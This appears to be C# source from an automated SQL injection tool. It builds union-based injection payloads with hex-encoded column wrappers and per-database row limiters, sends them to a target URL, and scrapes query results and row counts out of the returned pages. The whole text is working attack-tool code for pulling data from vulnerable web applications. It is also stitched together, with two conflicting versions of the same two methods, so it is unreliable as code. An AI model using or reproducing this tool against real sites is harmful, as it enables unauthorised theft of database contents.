public string GetSingleCustomQueryResultRow(int startingFrom)
{
string results = string.Empty;
StringBuilder sbResult = new StringBuilder();
string generatedPayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
StringBuilder sbCurExploit = new StringBuilder();
int columnIndexCounter = 0;
string generatedPayloadWithLimit = string.Empty;
for (int j = 0; j < _nrCols; j++)
{
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
{
generatedPayloadWithLimit = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms), generatedPayload, startingFrom + j);
}
if (_visibleColumnIndexes.Contains(j))
{
/*
* sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapper, _visibleColumnIndexes[columnIndexCounter],
* (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
*/
sbCurExploit.Append(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart1);
sbCurExploit.Append(UrlHelpers.HexEncodeValue(string.Format(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart2,
_visibleColumnIndexes[columnIndexCounter])));
sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectCountedResultWrapperPart3,
(PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple) ? generatedPayloadWithLimit : generatedPayload);
columnIndexCounter++;
}
else
{
sbCurExploit.AppendFormat(j.ToString());
}
if (j < _nrCols - 1)
{
sbCurExploit.Append(",");
}
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
IList <string> resultsBatch = HtmlHelpers.GetMultipleAnswersFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
string actualValue = string.Empty;
int separatorIndex = 0;
int columnIndex = 0;
string columnIndexString = "";
IList <int> columnsProcessed = new List <int>();
foreach (string singleResult in resultsBatch)
{
//@TODO: strip scripts
separatorIndex = singleResult.IndexOf(GeneralPayloads.UnionBasedResultSeparator);
if (separatorIndex != -1)
{
columnIndexString = singleResult.Substring(0, separatorIndex);
if (!int.TryParse(columnIndexString, out columnIndex))
{
continue;
}
if (columnsProcessed.Contains(columnIndex))
{
continue;
}
else
{
columnsProcessed.Add(columnIndex);
}
actualValue = singleResult.Substring(separatorIndex + GeneralPayloads.UnionBasedResultSeparator.Length);
if (!string.IsNullOrEmpty(MappingFile))
{
XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, actualValue, this,
(this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
}
sbResult.Append(actualValue);
sbResult.Append(Environment.NewLine);
}
if (columnsProcessed.Count == _visibleColumnIndexes.Count)
{
break;
}
}
return(sbResult.ToString());
}
public int GetTotalNoOfCustomQueryResultRows()
{
int count = 0;
string generatedpayload = string.Empty;
if (PayloadDetails == null)
{
return(0);
}
if (string.IsNullOrEmpty(PayloadDetails.Payload))
{
return(0);
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
{
return(1);
}
generatedpayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
generatedpayload = /*UrlHelpers.HexEncodeValue(*/ string.Format(GeneralPayloads.QueryResultCount, generatedpayload);//);
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedpayload);
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
string countString = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
int.TryParse(countString, out count);
return(count);
}
public int GetTotalNoOfCustomQueryResultRows()
{
if (_nrCols == 0 || _nrVisibleCols == 0 || _visibleColumnIndexes.Count() == 0)
{
if (!TestIfVulnerable())
{
throw new SqlInjException("Given script is not injectable using current injection strategy");
}
}
int count = 0;
string generatedpayload = string.Empty;
if (PayloadDetails == null)
{
return(0);
}
if (string.IsNullOrEmpty(PayloadDetails.Payload))
{
return(0);
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Single)
{
return(1);
}
generatedpayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedpayload = generatedpayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
generatedpayload = string.Format(GeneralPayloads.QueryResultCount, generatedpayload);
StringBuilder sbCurExploit = new StringBuilder();
sbCurExploit.AppendFormat(GeneralPayloads.UnionBasedSelectResultWrapper, generatedpayload);
if (_nrCols > 1)
{
sbCurExploit.Append(",");
}
for (int j = 1; j < _nrCols; j++)
{
sbCurExploit.Append(j.ToString());
if (j < _nrCols - 1)
{
sbCurExploit.Append(",");
}
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, sbCurExploit.ToString());
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
var result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
int.TryParse(result, out count);
return(count);
}
public string GetSingleCustomQueryResultRow(int startingFrom)
{
string result = string.Empty;
string generatedPayload = PayloadDetails.Payload;
if (PayloadDetails.Params != null && PayloadDetails.Params.Count() > 0)
{
foreach (var param in PayloadDetails.Params)
{
generatedPayload = generatedPayload.Replace("{" + param.Position + "}", PayloadHelpers.GetData(param.Name, this));
}
}
if (PayloadDetails.ExpectedResultType == Enums.ExpectedResultType.Multiple)
{
generatedPayload = string.Format(PayloadHelpers.GetSingleResultLimiter(PayloadDetails.Dbms),
generatedPayload, startingFrom);
}
string query = QueryHelper.CreateQuery(Url, ExploitDetails.Exploit, generatedPayload);
string pageHtml = QueryRunner.GetPageHtml(query, UseProxy ? ProxyDetails : null);
result = HtmlHelpers.GetAnswerFromHtml(pageHtml, query, ExploitDetails, DetailedExceptions);
//@TODO: strip scripts
if (!string.IsNullOrEmpty(MappingFile) && !string.IsNullOrEmpty(result))
{
XmlHelpers.SaveToMappingFile(MappingFile, PayloadDetails, result, this,
(this.ExploitDetails != null) ? this.ExploitDetails.Dbms : string.Empty);
}
return(result);
}